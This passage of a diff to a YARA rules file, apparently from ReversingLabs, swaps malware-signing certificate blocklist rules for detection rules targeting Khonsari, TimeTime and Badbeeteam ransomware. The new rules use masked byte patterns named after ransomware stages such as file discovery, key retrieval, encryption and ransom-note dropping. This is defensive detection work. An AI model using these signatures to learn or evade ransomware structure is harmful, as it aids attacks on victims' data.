+            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures [ i ] . serial == "c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" ) and 1583824676 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Khonsari ransomware."
 		author = "ReversingLabs"
-		id = "d2d71058-f7b9-594f-b099-75aa4774306f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da"
+		date = "2022-01-27"
+		modified = "2022-01-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3636-L3654"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Khonsari"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B
+            16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11
+            ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 26 2A
+        }
+		$get_key = {
+            73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
+            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D
+            ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ??
+            ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11
+            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
+        }
+		$encrypt_files = {
+            28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20
+            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ??
+            ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ??
+            ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures [ i ] . serial == "cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" ) and 1578786662 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $get_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TimeTime ransomware."
 		author = "ReversingLabs"
-		id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3"
+		date = "2022-02-21"
+		modified = "2022-02-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3656-L3674"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TimeTime"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$rename_files = {
+            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ??
+            ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$find_files = {
+            00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ??
+            ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C
+            ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ??
+            ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
+            32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ??
+            00 00 DE ?? 06 0C 2B ?? 08 2A
+        }
+		$encrypt_folder = {
+            00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C
+            00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19
+            73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ??
+            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C
+            ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ??
+            ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$encrypt_files = {
+            00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B
+            ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ??
+            17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E
+            ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures [ i ] . serial == "ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" ) and 1582675200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $encrypt_folder ) and ( $rename_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Badbeeteam ransomware."
 		author = "ReversingLabs"
-		id = "0cf7573f-290d-58ac-989f-f82e9313d54e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "39490b21-34b9-51cb-a3ed-672b3186a233"
+		date = "2020-11-13"
+		modified = "2020-11-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3676-L3694"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Badbeeteam"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
+            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
+            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
+            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
+            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
+            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
+        }
+		$find_files_p2 = {
+            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
+            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
+            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
+            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            59 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 F1 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ??
+            51 E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 89 D6 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? FF 04 24 51 57 E8 ?? ?? ?? ?? 58 59 8D 8C
+            24 ?? ?? ?? ?? 8D 54 24 ?? 57 E8 ?? ?? ?? ?? 58 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ??
+            ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 8D 84 24 ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 31 C0 C7 44 24 ?? ?? ?? ?? ?? 40 89
+            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 59 89 D6 B9 ?? ?? ?? ?? 6A ?? 5A 56 50 E8 ?? ?? ?? ?? 59 5A 89 F9 89 C3
+            E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 6A ?? 59 8D 7C 24 ?? 8D B4 24 ?? ?? ?? ?? F3
+            A5 6A ?? 59 8D BC 24 ?? ?? ?? ?? 8D 74 24 ?? 31 C0 F3 A5 E9 ?? ?? ?? ?? 8B 84 24 ??
+            ?? ?? ?? 85 C0 74 ?? 8B 8C 24 ?? ?? ?? ?? 50 FF 11 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B
+            70 ?? 8B 78 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 89 C1 89 F2 57 E8 ?? ?? ?? ??
+            58 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 69
+        }
+		$encrypt_files_p2 = {
+            7B ?? ?? ?? ?? ?? 89 C6 83 C6 ?? 85 FF 74 ?? 83 7E ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ??
+            ?? ?? 58 81 C6 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 74 ?? 83 3E ?? 74 ??
+            8D 4E ?? E8 ?? ?? ?? ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58 8B 06 F0 FF 08 75 ?? 56
+            E8 ?? ?? ?? ?? EB ?? 53 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ?? 85 C9 74 ??
+            8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59
+            6B 5B ?? ?? 89 C7 89 C6 83 C7 ?? 85 DB 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 83 7E ?? ?? 74
+            ?? 57 E8 ?? ?? ?? ?? 58 83 3F ?? 74 ?? 8D 47 ?? EB ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 58
+            83 C6 ?? 83 C7 ?? 83 C3 ?? EB ?? 8D 84 24 ?? ?? ?? ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ??
+            ?? 58 59 8B 4C 24 ?? 85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 8D B4 24
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 6B 7E ?? ?? 89 C1 85 FF 74 ?? 8D 59 ?? 83 C1 ?? E8
+            ?? ?? ?? ?? 89 D9 83 C7 ?? 8D 5C 24 ?? EB ?? 56 53 E8 ?? ?? ?? ?? 58 59 8B 4C 24 ??
+            85 C9 74 ?? 8B 54 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 58 A1 ?? ?? ?? ?? 8B 00 83 F8 ??
+            72 ?? 89 E0 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 C6 89 D7 68 ?? ?? ?? ?? 8D 44
+            24 ?? 50 E8 ?? ?? ?? ?? 59 59 89 B4 24 ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ??
+            ?? ?? ?? 89 94 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 58 89 44 24 ?? 83 64 24
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 83 C7 ?? 8D 4E ?? E8 ??
+            ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 66 ?? ?? 89 F9 E8 ?? ?? ?? ?? 8D 65 ?? 5E 5F 5B 5D
+            C3
+        }
+		$drop_hta_file_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 89 D3 89 F9 89
+            C2 53 E8 ?? ?? ?? ?? 58 8D B4 24 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 58 31 DB 43 53 57 E8 ?? ?? ?? ?? 59
+            5A 53 89 DF 50 E8 ?? ?? ?? ?? 59 5A 8D 5C 24 ?? 89 C2 89 D9 56 E8 ?? ?? ?? ?? 58 39
+            3B 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ??
+            ?? F2 0F 11 44 24 ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 89
+            84 24 ?? ?? ?? ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 40 89
+            84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 BC 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ??
+            ?? EB ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            8D BC 24 ?? ?? ?? ?? 57 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F1 E8 ??
+            ?? ?? ?? 57 E8 ?? ?? ?? ?? 58 6A ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+        }
+		$drop_hta_file_p2 = {
+            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58
